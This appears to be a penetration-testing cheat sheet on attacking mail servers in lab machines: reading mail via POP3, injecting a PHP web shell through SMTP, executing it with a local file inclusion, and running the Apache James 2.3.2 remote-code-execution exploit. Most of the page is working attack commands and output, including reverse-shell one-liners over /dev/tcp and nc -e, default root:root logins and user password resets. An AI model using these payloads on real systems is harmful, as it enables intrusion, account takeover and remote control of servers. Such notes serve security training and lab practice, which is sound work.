Email SMTP

Read emails

telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2

+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah

Send email with telnet

SMTP: 25
Bonus: Inject a php exploit.. you will need an LFI to read/execute it though
REF: PBX-PhpEmailExploit

telnet $IP 25
EHLO beep.htb               ..Any hello will work
VRFY hacked@localhost       ..rejected
VRFY asterisk@localhost     ..Verified
mail from:[email protected]
rcpt to:askerisk@localhost  ..Same as Verified
data                        ..Begin Email
Subject:Testing!

Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.                                            ..to end the email
quit

sendmail with attachment

Instead of telnet, EHLO, blah blah...
Send a Reverse shell php

> sendmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f [email protected]

execute and connect

LFI Execution Example (for after you've sent the evil email)

> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action

.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
                                                                         |
                                                                        Goal

Files

cat /var/mail/askerisk

Thunderbird

If you have a user/pass, you can open thunderbird to browser emails
You might find a password that you could use for SSH too!! REF: solidstateHTB

thunderbird
create new account: email
mindy@$10.x.x.x
password
read emails

James Server 2.3.2

Java Apache Mail Enterprise Server (JAMES)
- Open source SMTP and POP3 mail transfer agent and NNTP news server
- https://james.apache.org/
- Default Login: root:root
Connect and Reset user-email password
Then use Thunderbird email to look for clues

nmap -p- 10.x.x.x
PORT     STATE SERVICE
25/tcp   open  smtp   ..mail server will be present too
110/tcp  open  pop3   ..mail component
119/tcp  open  nntp   ..not sure this is related
4555/tcp open  rsip   ..JAMES connect port for admin tool!!


nc $IP 4555           ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin          ..fail
root:root            ..ok

help
listusers
setpassword admin password
setpassword mindy password  ..will update a user's email password

James Server Exploit 2.3.2 (RCE)

35513 will get you a full-shell
Requirements:
- Default login: root/root
- Must have a working ssh login user/pass (limited is ok)
- Need to update the payload for reverse-connect
Will add a weird user account: ../../../etc/bash_completion.d
Sends email to our 'weird' user-directory
When anybody logs into ssh, we will get execution
Confused?
- Yes, you need an ssh login already.. but if its limited it wont do much
- This will get you a full-shell, instead of a limited
- Next step is to look for PrivEsc !!

searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'     ..optional

python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

ssh user@server  ..will pop the exploit
nc -nvlp 4444    ..listen
connected        ..with full shell

https://book.hacktricks.xyz/pentesting/pentesting-smtp

PreviousChar Evasion Tricks NextEternal Blue

Last updated 2 years ago

Was this helpful?

Read emails

Send email with telnet

sendmail with attachment

execute and connect

Files

Thunderbird

James Server 2.3.2

James Server Exploit 2.3.2 (RCE)

More